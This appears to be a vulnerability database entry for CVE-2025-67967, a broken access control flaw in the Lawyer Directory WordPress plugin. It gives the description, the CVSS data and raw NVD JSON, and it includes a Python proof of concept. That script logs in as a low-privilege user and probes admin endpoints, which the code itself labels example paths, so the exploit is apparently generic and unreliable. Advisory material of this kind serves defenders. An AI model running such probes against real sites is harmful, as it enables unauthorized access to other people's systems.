Security Vulnerability Report
中文
CVE-2025-67967 CVSS 7.6 HIGH

CVE-2025-67967

Published: 2026-01-22 17:16:06
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in e-plugins Lawyer Directory lawyer-directory allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Lawyer Directory: from n/a through <= 1.3.3.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Lawyer Directory WordPress Plugin <= 1.3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67967 PoC - Lawyer Directory Broken Access Control # This PoC demonstrates accessing admin-only functions with low-privilege user import requests TARGET_URL = "http://target-wordpress-site.com" USERNAME = "low_privilege_user" PASSWORD = "user_password" # Login to get authentication cookies def login(): session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" data = { "log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In" } response = session.post(login_url, data=data) return session if "wordpress_logged_in" in str(response.cookies) else None # Exploit: Access admin function without proper authorization def exploit_unauthorized_access(session): # Target vulnerable endpoint (example paths) vulnerable_endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php?action=lawyer_directory_admin_action", f"{TARGET_URL}/wp-json/lawyer-directory/v1/admin/settings", f"{TARGET_URL}/wp-admin/admin.php?page=lawyer-directory&action=export_data" ] for endpoint in vulnerable_endpoints: response = session.get(endpoint) # Check if access was granted without proper authorization if response.status_code == 200 and "admin" in response.text.lower(): print(f"[!] Vulnerable endpoint found: {endpoint}") print(f"[+] Unauthorized access successful!") return True return False if __name__ == "__main__": session = login() if session: if exploit_unauthorized_access(session): print("[*] CVE-2025-67967 is exploitable!") else: print("[*] Target may be patched or not vulnerable") else: print("[*] Login failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67967", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:06.233", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in e-plugins Lawyer Directory lawyer-directory allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Lawyer Directory: from n/a through <= 1.3.3."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en e-plugins Lawyer Directory lawyer-directory permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Lawyer Directory: desde n/a hasta &lt;= 1.3.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/lawyer-directory/vulnerability/wordpress-lawyer-directory-plugin-1-3-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}